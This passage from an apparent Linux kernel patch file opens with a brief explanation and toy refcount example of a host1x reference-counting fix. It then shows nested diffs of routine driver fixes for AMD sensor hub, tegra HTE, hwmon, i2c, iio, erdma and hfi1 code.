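The host1x fix restores the driver-core reference rules: a failed device_add() must be answered with put_device(), and a successful one undone via device_unregister() (device_del() plus put_device()), so the release callback runs exactly once. A toy refcount model of that rule, not the real driver-core machinery:

#include <stdio.h>

struct toy_dev { int refs; };

static void put_dev(struct toy_dev *d)
{
	if (--d->refs == 0)
		printf("release callback runs, memory may be freed\n");
}

int main(void)
{
	struct toy_dev d = { .refs = 1 };	/* device_initialize() */
	int err = -1;				/* pretend device_add() failed */

	if (err)
		put_dev(&d);	/* the fix: drop the ref instead of leaking it */
	return 0;
}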
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index 47774b9ab3de0..c936d6a51c0cd 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -367,6 +367,14 @@ init_done:
+ 	return devm_add_action_or_reset(&pdev->dev, privdata->mp2_ops->remove, privdata);
+ }
+ 
++static void amd_sfh_shutdown(struct pci_dev *pdev)
++{
++	struct amd_mp2_dev *mp2 = pci_get_drvdata(pdev);
++
++	if (mp2 && mp2->mp2_ops)
++		mp2->mp2_ops->stop_all(mp2);
++}
++
+ static int __maybe_unused amd_mp2_pci_resume(struct device *dev)
+ {
+ 	struct amd_mp2_dev *mp2 = dev_get_drvdata(dev);
+@@ -401,6 +409,7 @@ static struct pci_driver amd_mp2_pci_driver = {
+ 	.id_table	= amd_mp2_pci_tbl,
+ 	.probe		= amd_mp2_pci_probe,
+ 	.driver.pm	= &amd_mp2_pm_ops,
++	.shutdown	= amd_sfh_shutdown,
+ };
+ module_pci_driver(amd_mp2_pci_driver);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 0609fea581c96..6f0d332ccf51c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -218,7 +218,7 @@ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
+ 			     OFFSET_SENSOR_DATA_DEFAULT;
+ 		memcpy_fromio(&als_data, sensoraddr, sizeof(struct sfh_als_data));
+ 		get_common_inputs(&als_input.common_property, report_id);
+-		als_input.illuminance_value = als_data.lux;
++		als_input.illuminance_value = float_to_int(als_data.lux);
+ 		report_size = sizeof(als_input);
+ 		memcpy(input_report, &als_input, sizeof(als_input));
+ 		break;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index a1d6e08fab7d4..bb8bd7892b674 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -112,6 +112,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_sfh_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -170,6 +171,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = (status == 0) ? SENSOR_ENABLED : SENSOR_DISABLED;
+ 
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(i, cl_data);
+ 			if (rc) {
+@@ -186,12 +188,21 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		dev_warn(dev, "Sensor discovery failed: no sensors enabled (%d)\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+index c6df959ec7252..4f81ef2d4f56e 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+@@ -16,11 +16,11 @@ static int amd_sfh_wait_response(struct amd_mp2_dev *mp2, u8 sid, u32 cmd_id)
+ {
+ 	struct sfh_cmd_response cmd_resp;
+ 
+-	/* Get response with status within a max of 1600 ms timeout */
++	/* Get response with status within a max of 10000 ms timeout */
+ 	if (!readl_poll_timeout(mp2->mmio + AMD_P2C_MSG(0), cmd_resp.resp,
+ 				(cmd_resp.response.response == 0 &&
+ 				cmd_resp.response.cmd_id == cmd_id && (sid == 0xff ||
+-				cmd_resp.response.sensor_id == sid)), 500, 1600000))
++				cmd_resp.response.sensor_id == sid)), 500, 10000000))
+ 		return cmd_resp.response.response;
+ 
+ 	return -1;
+@@ -33,6 +33,7 @@ static void amd_start_sensor(struct amd_mp2_dev *privdata, struct amd_mp2_sensor
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = ENABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = info.sensor_idx;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+@@ -45,6 +46,7 @@ static void amd_stop_sensor(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = sensor_idx;
+ 
+ 	writeq(0x0, privdata->mmio + AMD_C2P_MSG(1));
+@@ -56,8 +58,10 @@ static void amd_stop_all_sensor(struct amd_mp2_dev *privdata)
+ 	struct sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.ul = 0;
+-	cmd_base.cmd.cmd_id = STOP_ALL_SENSORS;
++	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	/* 0xf indicates all sensors */
++	cmd_base.cmd.sensor_id = 0xf;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+ }
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+index ae47a369dc05a..9d31d5b510eb4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+@@ -33,9 +33,9 @@ struct sfh_cmd_base {
+ 		struct {
+ 			u32 sensor_id		: 4;
+ 			u32 cmd_id		: 4;
+-			u32 sub_cmd_id		: 6;
+-			u32 length		: 12;
+-			u32 rsvd		: 5;
++			u32 sub_cmd_id		: 8;
++			u32 sub_cmd_value	: 12;
++			u32 rsvd		: 3;
+ 			u32 intr_disable	: 1;
+ 		} cmd;
+ 	};
+@@ -133,7 +133,7 @@ struct sfh_mag_data {
+ 
+ struct sfh_als_data {
+ 	struct sfh_common_data commondata;
+-	u16 lux;
++	u32 lux;
+ };
+ 
+ struct hpd_status {
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index 5d776a185bd62..ce8c44e792213 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/err.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
+ #include <linux/interrupt.h>
+diff --git a/drivers/hte/hte-tegra194.c b/drivers/hte/hte-tegra194.c
+index 49a27af22742b..d1b579c822797 100644
+--- a/drivers/hte/hte-tegra194.c
++++ b/drivers/hte/hte-tegra194.c
+@@ -251,7 +251,7 @@ static int tegra_hte_map_to_line_id(u32 eid,
+ {
+ 
+ 	if (m) {
+-		if (eid > map_sz)
++		if (eid >= map_sz)
+ 			return -EINVAL;
+ 		if (m[eid].slice == NV_AON_SLICE_INVALID)
+ 			return -EINVAL;
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6e4c92b500b8e..6a6ebcc896b1d 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1604,9 +1604,9 @@ static int adt7475_set_pwm_polarity(struct i2c_client *client)
+ 	int ret, i;
+ 	u8 val;
+ 
+-	ret = of_property_read_u32_array(client->dev.of_node,
+-					 "adi,pwm-active-state", states,
+-					 ARRAY_SIZE(states));
++	ret = device_property_read_u32_array(&client->dev,
++					     "adi,pwm-active-state", states,
++					     ARRAY_SIZE(states));
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 5a9d47a229e40..be8bbb1c3a02d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -75,6 +75,7 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ 
+ #define ZEN_CUR_TEMP_SHIFT			21
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
++#define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+@@ -155,7 +156,8 @@ static long get_raw_temp(struct k10temp_data *data)
+ 
+ 	data->read_tempreg(data->pdev, &regval);
+ 	temp = (regval >> ZEN_CUR_TEMP_SHIFT) * 125;
+-	if (regval & data->temp_adjust_mask)
++	if ((regval & data->temp_adjust_mask) ||
++	    (regval & ZEN_CUR_TEMP_TJ_SEL_MASK) == ZEN_CUR_TEMP_TJ_SEL_MASK)
+ 		temp -= 49000;
+ 	return temp;
+ }
+diff --git a/drivers/hwmon/pmbus/fsp-3y.c b/drivers/hwmon/pmbus/fsp-3y.c
+index aec294cc72d1f..c7469d2cdedcf 100644
+--- a/drivers/hwmon/pmbus/fsp-3y.c
++++ b/drivers/hwmon/pmbus/fsp-3y.c
+@@ -180,7 +180,6 @@ static struct pmbus_driver_info fsp3y_info[] = {
+ 			PMBUS_HAVE_FAN12,
+ 		.func[YM2151_PAGE_5VSB_LOG] =
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_IOUT,
+-			PMBUS_HAVE_IIN,
+ 		.read_word_data = fsp3y_read_word_data,
+ 		.read_byte_data = fsp3y_read_byte_data,
+ 	},
+diff --git a/drivers/hwtracing/coresight/coresight-etm-perf.c b/drivers/hwtracing/coresight/coresight-etm-perf.c
+index 43bbd5dc3d3b1..f9a0ee49d8e80 100644
+--- a/drivers/hwtracing/coresight/coresight-etm-perf.c
++++ b/drivers/hwtracing/coresight/coresight-etm-perf.c
+@@ -870,6 +870,7 @@ int __init etm_perf_init(void)
+ 	etm_pmu.addr_filters_sync	= etm_addr_filters_sync;
+ 	etm_pmu.addr_filters_validate	= etm_addr_filters_validate;
+ 	etm_pmu.nr_addr_filters		= ETM_ADDR_CMP_MAX;
++	etm_pmu.module			= THIS_MODULE;
+ 
+ 	ret = perf_pmu_register(&etm_pmu, CORESIGHT_ETM_PMU_NAME, -1);
+ 	if (ret == 0)
+diff --git a/drivers/i2c/busses/i2c-cadence.c b/drivers/i2c/busses/i2c-cadence.c
+index f58943cb13414..8a5fdb150c446 100644
+--- a/drivers/i2c/busses/i2c-cadence.c
++++ b/drivers/i2c/busses/i2c-cadence.c
+@@ -833,8 +833,10 @@ static int cdns_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
+ #if IS_ENABLED(CONFIG_I2C_SLAVE)
+ 	/* Check i2c operating mode and switch if possible */
+ 	if (id->dev_mode == CDNS_I2C_MODE_SLAVE) {
+-		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE)
+-			return -EAGAIN;
++		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/* Set mode to master */
+ 		cdns_i2c_set_mode(CDNS_I2C_MODE_MASTER, id);
+diff --git a/drivers/i2c/busses/i2c-omap.c b/drivers/i2c/busses/i2c-omap.c
+index f9ae520aed228..7ec2521997061 100644
+--- a/drivers/i2c/busses/i2c-omap.c
++++ b/drivers/i2c/busses/i2c-omap.c
+@@ -1058,7 +1058,7 @@ omap_i2c_isr(int irq, void *dev_id)
+ 	u16 stat;
+ 
+ 	stat = omap_i2c_read_reg(omap, OMAP_I2C_STAT_REG);
+-	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG);
++	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG) & ~OMAP_I2C_STAT_NACK;
+ 
+ 	if (stat & mask)
+ 		ret = IRQ_WAKE_THREAD;
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index bee5a2ef1f229..2bf3713b1969d 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -704,7 +704,7 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	err = xiic_start_xfer(i2c, msgs, num);
+ 	if (err < 0) {
+ 		dev_err(adap->dev.parent, "Error xiic_start_xfer\n");
+-		return err;
++		goto out;
+ 	}
+ 
+ 	err = wait_for_completion_timeout(&i2c->completion, XIIC_XFER_TIMEOUT);
+@@ -722,6 +722,8 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		err = (i2c->state == STATE_DONE) ? num : -EIO;
+ 	}
+ 	mutex_unlock(&i2c->lock);
++
++out:
+ 	pm_runtime_mark_last_busy(i2c->dev);
+ 	pm_runtime_put_autosuspend(i2c->dev);
+ 	return err;
+diff --git a/drivers/iio/adc/palmas_gpadc.c b/drivers/iio/adc/palmas_gpadc.c
+index fd000345ec5cf..849a697a467e5 100644
+--- a/drivers/iio/adc/palmas_gpadc.c
++++ b/drivers/iio/adc/palmas_gpadc.c
+@@ -639,7 +639,7 @@ out:
+ 
+ static int palmas_gpadc_remove(struct platform_device *pdev)
+ {
+-	struct iio_dev *indio_dev = dev_to_iio_dev(&pdev->dev);
++	struct iio_dev *indio_dev = dev_get_drvdata(&pdev->dev);
+ 	struct palmas_gpadc *adc = iio_priv(indio_dev);
+ 
+ 	if (adc->wakeup1_enable || adc->wakeup2_enable)
+diff --git a/drivers/iio/addac/stx104.c b/drivers/iio/addac/stx104.c
+index 48a91a95e597b..b658a75d4e3a8 100644
+--- a/drivers/iio/addac/stx104.c
++++ b/drivers/iio/addac/stx104.c
+@@ -15,6 +15,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
++#include <linux/mutex.h>
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+@@ -69,10 +70,12 @@ struct stx104_reg {
+ 
+ /**
+  * struct stx104_iio - IIO device private data structure
++ * @lock: synchronization lock to prevent I/O race conditions
+  * @chan_out_states:	channels' output states
+  * @reg:		I/O address offset for the device registers
+  */
+ struct stx104_iio {
++	struct mutex lock;
+ 	unsigned int chan_out_states[STX104_NUM_OUT_CHAN];
+ 	struct stx104_reg __iomem *reg;
+ };
+@@ -114,6 +117,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 			return IIO_VAL_INT;
+ 		}
+ 
++		mutex_lock(&priv->lock);
++
+ 		/* select ADC channel */
+ 		iowrite8(chan->channel | (chan->channel << 4), &reg->achan);
+ 
+@@ -124,6 +129,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 		while (ioread8(&reg->cir_asr) & BIT(7));
+ 
+ 		*val = ioread16(&reg->ssr_ad);
++
++		mutex_unlock(&priv->lock);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* get ADC bipolar/unipolar configuration */
+@@ -178,9 +185,12 @@ static int stx104_write_raw(struct iio_dev *indio_dev,
+ 			if ((unsigned int)val > 65535)
+ 				return -EINVAL;
+ 
++			mutex_lock(&priv->lock);
++
+ 			priv->chan_out_states[chan->channel] = val;
+ 			iowrite16(val, &priv->reg->dac[chan->channel]);
+ 
++			mutex_unlock(&priv->lock);
+ 			return 0;
+ 		}
+ 		return -EINVAL;
+@@ -351,6 +361,8 @@ static int stx104_probe(struct device *dev, unsigned int id)
+ 
+ 	indio_dev->name = dev_name(dev);
+ 
++	mutex_init(&priv->lock);
++
+ 	/* configure device for software trigger operation */
+ 	iowrite8(0, &priv->reg->acr);
+ 
+diff --git a/drivers/iio/light/max44009.c b/drivers/iio/light/max44009.c
+index 801e5a0ad496b..f3648f20ef2c0 100644
+--- a/drivers/iio/light/max44009.c
++++ b/drivers/iio/light/max44009.c
+@@ -528,6 +528,12 @@ static int max44009_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static const struct of_device_id max44009_of_match[] = {
++	{ .compatible = "maxim,max44009" },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, max44009_of_match);
++
+ static const struct i2c_device_id max44009_id[] = {
+ 	{ "max44009", 0 },
+ 	{ }
+@@ -537,18 +543,13 @@ MODULE_DEVICE_TABLE(i2c, max44009_id);
+ static struct i2c_driver max44009_driver = {
+ 	.driver = {
+ 		.name = MAX44009_DRV_NAME,
++		.of_match_table = max44009_of_match,
+ 	},
+ 	.probe = max44009_probe,
+ 	.id_table = max44009_id,
+ };
+ module_i2c_driver(max44009_driver);
+ 
+-static const struct of_device_id max44009_of_match[] = {
+-	{ .compatible = "maxim,max44009" },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, max44009_of_match);
+-
+ MODULE_AUTHOR("Robert Eshleman <bobbyeshleman@gmail.com>");
+ MODULE_LICENSE("GPL v2");
+ MODULE_DESCRIPTION("MAX44009 ambient light sensor driver");
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 603c0aecc3614..ff58058aeadca 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -2912,6 +2912,8 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 	    (ari && ari_length > IB_CM_REJ_ARI_LENGTH))
+ 		return -EINVAL;
+ 
++	trace_icm_send_rej(&cm_id_priv->id, reason);
++
+ 	switch (state) {
+ 	case IB_CM_REQ_SENT:
+ 	case IB_CM_MRA_REQ_RCVD:
+@@ -2942,7 +2944,6 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 		return -EINVAL;
+ 	}
+ 
+-	trace_icm_send_rej(&cm_id_priv->id, reason);
+ 	ret = ib_post_send_mad(msg, NULL);
+ 	if (ret) {
+ 		cm_free_msg(msg);
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index 8a8d4539a006b..51ab2058b03f1 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -112,6 +112,10 @@
+ 
+ #define ERDMA_PAGE_SIZE_SUPPORT 0x7FFFF000
+ 
++/* Hardware page size definition */
++#define ERDMA_HW_PAGE_SHIFT 12
++#define ERDMA_HW_PAGE_SIZE 4096
++
+ /* WQE related. */
+ #define EQE_SIZE 16
+ #define EQE_SHIFT 4
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 9c30d78730aa1..83e1b0d559771 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -38,7 +38,7 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		   FIELD_PREP(ERDMA_CMD_CREATE_QP_PD_MASK, pd->pdn);
+ 
+ 	if (rdma_is_kernel_res(&qp->ibqp.res)) {
+-		u32 pgsz_range = ilog2(SZ_1M) - PAGE_SHIFT;
++		u32 pgsz_range = ilog2(SZ_1M) - ERDMA_HW_PAGE_SHIFT;
+ 
+ 		req.sq_cqn_mtt_cfg =
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+@@ -66,13 +66,13 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		user_qp = &qp->user_qp;
+ 		req.sq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->sq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->sq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.sq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->scq->cqn);
+ 
+ 		req.rq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->rq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->rq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.rq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->rcq->cqn);
+ 
+@@ -162,7 +162,7 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 	if (rdma_is_kernel_res(&cq->ibcq.res)) {
+ 		page_size = SZ_32M;
+ 		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(page_size) - PAGE_SHIFT);
++				       ilog2(page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.qbuf_addr_l = lower_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 		req.qbuf_addr_h = upper_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 
+@@ -175,8 +175,9 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 			cq->kern_cq.qbuf_dma_addr + (cq->depth << CQE_SHIFT);
+ 	} else {
+ 		mtt = &cq->user_cq.qbuf_mtt;
+-		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(mtt->page_size) - PAGE_SHIFT);
++		req.cfg0 |=
++			FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
++				   ilog2(mtt->page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		if (mtt->mtt_nents == 1) {
+ 			req.qbuf_addr_l = lower_32_bits(*(u64 *)mtt->mtt_buf);
+ 			req.qbuf_addr_h = upper_32_bits(*(u64 *)mtt->mtt_buf);
+@@ -636,7 +637,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	u32 rq_offset;
+ 	int ret;
+ 
+-	if (len < (PAGE_ALIGN(qp->attrs.sq_size * SQEBB_SIZE) +
++	if (len < (ALIGN(qp->attrs.sq_size * SQEBB_SIZE, ERDMA_HW_PAGE_SIZE) +
+ 		   qp->attrs.rq_size * RQE_SIZE))
+ 		return -EINVAL;
+ 
+@@ -646,7 +647,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	if (ret)
+ 		return ret;
+ 
+-	rq_offset = PAGE_ALIGN(qp->attrs.sq_size << SQEBB_SHIFT);
++	rq_offset = ALIGN(qp->attrs.sq_size << SQEBB_SHIFT, ERDMA_HW_PAGE_SIZE);
+ 	qp->user_qp.rq_offset = rq_offset;
+ 
+ 	ret = get_mtt_entries(qp->dev, &qp->user_qp.rq_mtt, va + rq_offset,
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 5d9a7b09ca37e..8973a081d641e 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,6 +215,7 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
++				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+@@ -737,10 +738,13 @@ int hfi1_ipoib_txreq_init(struct hfi1_ipoib_dev_priv *priv)
+ 		txq->tx_ring.shift = ilog2(tx_item_size);
+ 		txq->tx_ring.avail = hfi1_ipoib_ring_hwat(txq);
+ 		tx_ring = &txq->tx_ring;
+-		for (j = 0; j < tx_ring_size; j++)
++		for (j = 0; j < tx_ring_size; j++) {
+ 			hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr =
+ 				kzalloc_node(sizeof(*tx->sdma_hdr),
+ 					     GFP_KERNEL, priv->dd->node);
++			if (!hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr)
++				goto free_txqs;
++		}
+ 
+ 		netif_napi_add_tx(dev, &txq->napi, hfi1_ipoib_poll_tx_ring);
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 7333646021bb8..71b9ac0188875 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -126,11 +126,11 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	node = __mmu_rb_search(handler, mnode->addr, mnode->len);
+ 	if (node) {
+-		ret = -EINVAL;
++		ret = -EEXIST;
+ 		goto unlock;
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+-	list_add(&mnode->list, &handler->lru_list);
++	list_add_tail(&mnode->list, &handler->lru_list);
+ 
+ 	ret = handler->ops->insert(handler->ops_arg, mnode);
+ 	if (ret) {
+@@ -143,6 +143,19 @@ unlock:
+ 	return ret;
+ }
+ 
++/* Caller must hold handler lock */
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr, unsigned long len)
++{
++	struct mmu_rb_node *node;
++
++	trace_hfi1_mmu_rb_search(addr, len);
++	node = __mmu_int_rb_iter_first(&handler->root, addr, (addr + len) - 1);
++	if (node)
++		list_move_tail(&node->list, &handler->lru_list);
++	return node;
++}
++
+ /* Caller must hold handler lock */
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 					   unsigned long addr,
+@@ -167,32 +180,6 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node)
+-{
+-	struct mmu_rb_node *node;
+-	unsigned long flags;
+-	bool ret = false;
+-
+-	if (current->mm != handler->mn.mm)
+-		return ret;
+-
+-	spin_lock_irqsave(&handler->lock, flags);
+-	node = __mmu_rb_search(handler, addr, len);
+-	if (node) {
+-		if (node->addr == addr && node->len == len)
+-			goto unlock;
+-		__mmu_int_rb_remove(node, &handler->root);
+-		list_del(&node->list); /* remove from LRU list */
+-		ret = true;
+-	}
+-unlock:
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-	*rb_node = node;
+-	return ret;
+-}
+-
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -206,8 +193,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	INIT_LIST_HEAD(&del_list);
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+-	list_for_each_entry_safe_reverse(rbnode, ptr, &handler->lru_list,
+-					 list) {
++	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -219,36 +205,11 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	while (!list_empty(&del_list)) {
+-		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
+-		list_del(&rbnode->list);
++	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+ 		handler->ops->remove(handler->ops_arg, rbnode);
+ 	}
+ }
+ 
+-/*
+- * It is up to the caller to ensure that this function does not race with the
+- * mmu invalidate notifier which may be calling the users remove callback on
